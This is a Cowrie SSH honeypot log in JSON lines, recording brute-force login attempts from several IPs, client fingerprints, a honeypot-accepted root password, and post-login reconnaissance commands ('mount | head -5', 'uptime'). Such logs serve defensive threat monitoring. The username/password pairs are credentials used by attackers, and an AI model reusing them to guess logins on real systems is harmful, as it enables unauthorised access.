{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:56:57.702227Z","src_ip":"41.226.27.251","session":"38d43281a561"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"8.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:02.586329Z","src_ip":"212.227.235.229","session":"98e26cabc40f"}
{"eventid":"cowrie.session.closed","duration":"77.3","message":"Connection lost after 77.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:02.683650Z","src_ip":"212.227.235.229","session":"98e26cabc40f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49160,"dst_ip":"1.2.3.4","dst_port":22,"session":"832cd625be28","protocol":"ssh","message":"New connection: 212.227.235.229:49160 (1.2.3.4:22) [session: 832cd625be28]","sensor":"my-vps","timestamp":"2025-08-31T02:57:06.566995Z"}
{"eventid":"cowrie.session.closed","duration":30.475825786590576,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:12.190198Z","src_ip":"117.173.88.106","session":"5d3f693e81e1"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44934,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8b7938b5d55","protocol":"ssh","message":"New connection: 41.226.27.251:44934 (1.2.3.4:22) [session: c8b7938b5d55]","sensor":"my-vps","timestamp":"2025-08-31T02:57:16.940365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:57:16.941681Z","src_ip":"41.226.27.251","session":"c8b7938b5d55"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:57:16.985752Z","src_ip":"41.226.27.251","session":"c8b7938b5d55"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123","message":"login attempt [hadoop/123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:57:17.152983Z","src_ip":"41.226.27.251","session":"c8b7938b5d55"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:18.406468Z","src_ip":"41.226.27.251","session":"c8b7938b5d55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38056,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a311ed17aa9","protocol":"ssh","message":"New connection: 212.227.235.229:38056 (1.2.3.4:22) [session: 6a311ed17aa9]","sensor":"my-vps","timestamp":"2025-08-31T02:57:19.006373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:57:19.426274Z","src_ip":"212.227.235.229","session":"832cd625be28"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:57:19.427299Z","src_ip":"212.227.235.229","session":"832cd625be28"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:57:19.946847Z","src_ip":"212.227.235.229","session":"6a311ed17aa9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:57:19.947510Z","src_ip":"212.227.235.229","session":"6a311ed17aa9"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar123","message":"login attempt [oscar/oscar123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:57:21.267546Z","src_ip":"212.227.125.160","session":"0d0195fba7cc"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345","message":"login attempt [ftpuser/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:57:25.849390Z","src_ip":"212.227.235.229","session":"6a311ed17aa9"}
{"eventid":"cowrie.session.closed","duration":"41.0","message":"Connection lost after 41.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:26.082722Z","src_ip":"212.227.125.160","session":"0d0195fba7cc"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:27.778962Z","src_ip":"212.227.235.229","session":"6a311ed17aa9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56532,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3ea00ae3742","protocol":"ssh","message":"New connection: 212.227.125.160:56532 (1.2.3.4:22) [session: c3ea00ae3742]","sensor":"my-vps","timestamp":"2025-08-31T02:57:28.531559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:57:29.598286Z","src_ip":"212.227.125.160","session":"c3ea00ae3742"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:57:29.599213Z","src_ip":"212.227.125.160","session":"c3ea00ae3742"}
{"eventid":"cowrie.login.success","username":"root","password":"Dados@2020@","message":"login attempt [root/Dados@2020@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:57:35.891096Z","src_ip":"212.227.125.160","session":"c3ea00ae3742"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":36820,"dst_ip":"1.2.3.4","dst_port":22,"session":"13e5dc83b995","protocol":"ssh","message":"New connection: 41.226.27.251:36820 (1.2.3.4:22) [session: 13e5dc83b995]","sensor":"my-vps","timestamp":"2025-08-31T02:57:37.394220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:57:37.397690Z","src_ip":"41.226.27.251","session":"13e5dc83b995"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:57:37.439226Z","src_ip":"41.226.27.251","session":"13e5dc83b995"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-31T02:57:37.703264Z","src_ip":"41.226.27.251","session":"13e5dc83b995"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:57:39.245487Z","src_ip":"212.227.125.160","session":"c3ea00ae3742"}
{"eventid":"cowrie.command.input","input":"mount | head -5","message":"CMD: mount | head -5","sensor":"my-vps","timestamp":"2025-08-31T02:57:39.246161Z","src_ip":"212.227.125.160","session":"c3ea00ae3742"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:39.248121Z","src_ip":"41.226.27.251","session":"13e5dc83b995"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54314,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9acbeae204b","protocol":"ssh","message":"New connection: 212.227.125.160:54314 (1.2.3.4:22) [session: b9acbeae204b]","sensor":"my-vps","timestamp":"2025-08-31T02:57:39.393312Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56658,"dst_ip":"1.2.3.4","dst_port":22,"session":"da33c5df1adc","protocol":"ssh","message":"New connection: 212.227.125.160:56658 (1.2.3.4:22) [session: da33c5df1adc]","sensor":"my-vps","timestamp":"2025-08-31T02:57:40.329296Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:57:40.795132Z","src_ip":"212.227.125.160","session":"da33c5df1adc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:57:40.835016Z","src_ip":"212.227.125.160","session":"da33c5df1adc"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"12345","message":"login attempt [ftpuser/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T02:57:42.681251Z","src_ip":"212.227.125.160","session":"da33c5df1adc"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:44.395118Z","src_ip":"212.227.125.160","session":"da33c5df1adc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","size":28,"shasum":"eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410","duplicate":true,"duration":"7.6","message":"Closing TTY Log: var/lib/cowrie/tty/eff265ce3fe88cc50aec4fb21ef2fa5564c880aafa6cd111cad97c6281d0b410 after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:46.838255Z","src_ip":"212.227.125.160","session":"c3ea00ae3742"}
{"eventid":"cowrie.session.closed","duration":"18.3","message":"Connection lost after 18.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:46.839828Z","src_ip":"212.227.125.160","session":"c3ea00ae3742"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":48910,"dst_ip":"1.2.3.4","dst_port":22,"session":"601f92616961","protocol":"ssh","message":"New connection: 201.148.180.50:48910 (1.2.3.4:22) [session: 601f92616961]","sensor":"my-vps","timestamp":"2025-08-31T02:57:46.995077Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:57:48.081656Z","src_ip":"201.148.180.50","session":"601f92616961"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:57:48.082312Z","src_ip":"201.148.180.50","session":"601f92616961"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57310,"dst_ip":"1.2.3.4","dst_port":22,"session":"c87091000f05","protocol":"ssh","message":"New connection: 212.227.235.229:57310 (1.2.3.4:22) [session: c87091000f05]","sensor":"my-vps","timestamp":"2025-08-31T02:57:54.235653Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:57:54.236738Z","src_ip":"212.227.235.229","session":"c87091000f05"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:57:54.488602Z","src_ip":"212.227.235.229","session":"c87091000f05"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:57:55.245775Z","src_ip":"212.227.235.229","session":"c87091000f05"}
{"eventid":"cowrie.login.success","username":"root","password":"Dados@2020@","message":"login attempt [root/Dados@2020@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:57:55.258093Z","src_ip":"201.148.180.50","session":"601f92616961"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:56.499586Z","src_ip":"212.227.235.229","session":"c87091000f05"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":49082,"dst_ip":"1.2.3.4","dst_port":22,"session":"e75a48900b30","protocol":"ssh","message":"New connection: 41.226.27.251:49082 (1.2.3.4:22) [session: e75a48900b30]","sensor":"my-vps","timestamp":"2025-08-31T02:57:57.517743Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:57:57.537595Z","src_ip":"41.226.27.251","session":"e75a48900b30"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:57:57.567077Z","src_ip":"41.226.27.251","session":"e75a48900b30"}
{"eventid":"cowrie.login.failed","username":"debianuser","password":"1qazXSW@","message":"login attempt [debianuser/1qazXSW@] failed","sensor":"my-vps","timestamp":"2025-08-31T02:57:57.828038Z","src_ip":"41.226.27.251","session":"e75a48900b30"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:57:58.855975Z","src_ip":"201.148.180.50","session":"601f92616961"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T02:57:58.856712Z","src_ip":"201.148.180.50","session":"601f92616961"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:57:59.011189Z","src_ip":"41.226.27.251","session":"e75a48900b30"}
